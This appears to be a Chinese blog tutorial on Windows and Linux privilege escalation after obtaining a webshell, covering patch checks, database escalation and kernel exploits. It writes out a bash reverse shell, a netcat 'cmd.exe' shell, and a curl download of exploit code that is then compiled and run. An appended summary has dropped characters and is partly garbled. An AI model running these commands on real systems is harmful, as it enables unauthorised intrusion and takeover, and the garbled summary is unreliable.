windows和linux提权

本文介绍了在获得webshell后如何进行权限提升,包括水平和垂直权限提升。在Windows系统中,提权方式包括操作系统漏洞利用、第三方服务如数据库提权;而在Linux系统中,提权涉及查找系统漏洞并利用。提权实战部分讨论了Windows内网渗透中的nc shell反弹和Linux的提权方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前提:拿到wbshell后做的事情
webshell 通常继承了web 用户的权限
通常情况下,web用户的权限是比较低的


   权限提升
1:获取其他用户的访问权限,甚至是管理员。
      ! 水平权限提升(越权)(普通用户更改普通用户的帖子)
                对一个论坛来说 :
                            超级管理员(管理所有)、版主(管理一版的帖子)、普通用户(管里自己的帖子)
                                                                                                                 A|B
      !垂直权限提升(更改版主或超级管理员的贴子)
       !如果以上两种情况,发生在web、App中
               失效的访问控制:就是未对通过身份验证的用户实施恰当的访问控制。攻击者可以利用这些缺陷访问未经授权的功能或数据,例如:访问其他用户的账户、查看敏感文件、修改其他用户的数据、更改访问权限等。
 

对于系统来说,就是“提权”,目标是获取root/administrator的权限。

提权的分类:   水平权限提升、垂直权限提升


依据操作系统分类:
编译器:
  windows系统:
提权方式:
        操作系统漏洞提权:
            步骤:1获取系统信息
                        命令是:systminfo  
                                根据没有修补的补丁号码,直接在网上找 利用程序   网址:www.7kb.org/138.html
                                漏洞(系统漏洞msxx-xx)与补丁(kB)的对应关系
                                   PR提权:win2003
                                        MS09-012
                                   巴西烤肉提权
                       2 直接用exp,exp就是编译好的针对某一漏洞的exe程序
          第三方服务提权
                就是数据库提权
                    分两种:1:MSSQL 提取
                                       关键步骤:就是获取sa用户的密码
                                            条件:数据库的端口、地址   sa  sa用户的密码
                                   2::MYSQL 提权
                                 分两种:1:UDF 提权
                                               2:MOF提权
            其他数据库    VNC   PCanywhere .........
linux系统:
自带的编译器:gcc
 
  1:利用系统漏洞进行提权 
            一;了解目标操作系统的内核版本号,去查找对应的能提权的漏洞 
                                命令:• cat /proc/version(系统版本信息)
                                          • uname -a(内核查询)
                                          • uname -mrs+-
                                          • rpm -q kernel
                                          • dmesg | grep Linux

                                           • ls /boot | grep vmlinuz
                 1;shell反弹
                    监听端口   nc.exe -lvvp 4444
                    /bin/bash -i >& /dev/tcp/ip地址/4444(端口号) 0<&1
                    查找提权的漏洞
                    kali中:searchsploit+系统
                    下载提权exp.c
                    curl http://172.18.199.91/35370.c > exp.c
        
                     编译并且运行
                     gcc exp.c -o exploit -lpthread

                      ./exploit
提权实战
1   如果对方windows系统,并且使用套件搭建服务,获取的webshell,即是system权限
    常见的套件: xampp   wamp    phpstudy


内网渗透
1   nc shell 反弹
     客户端首先执行    nc.exe -lvvp 777(端口号)
     服务器端执行     nc.exe -e cmd.exe 远程IP地址 端口号
Windows Linux 是指攻击者在已经获取了某一台计算机的低限访问(比如普通用户限)后,通过某些手段限,获得更高的限(比如管理员或root限),从而可以执行更高限的操作。以下是两种常见的方式: Windows : 1. 利用 Windows 操作系统漏洞进行。例如,使用 Meterpreter 或 Cobalt Strike 这样的渗透测试工具来利用已知的 Windows 操作系统漏洞进行。 2. 利用 Windows 服务的漏洞进行。例如,使用常见的 Windows 服务(如 RPC)的漏洞来限。 3. 利用 Windows 系统中的凭证(credential)进行。这包括本地用户帐户、密码哈希、NTLM哈希、Kerberos票据等。 Linux : 1. 利用 Linux 操作系统漏洞进行。例如,使用常见的 Linux 漏洞(如 Dirty COW)来限。 2. 利用 Linux 系统中的 SUID 文件进行。SUID 文件是一种特殊类型的文件,当普通用户执行它时,会以文件所有者的身份运行,从而高了运行该文件的限。 3. 利用 Linux 系统中的系统帐户进行。这包括 root 帐户、daemon 帐户等。 总之,攻击是一种危险的攻击,可以导致攻击者获得对系统的完全控制。为了防止这种攻击,我们应该定期更新操作系统应用程序,关闭不必要的服务端口,以及使用最新的安全防御措施来保护我们的系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值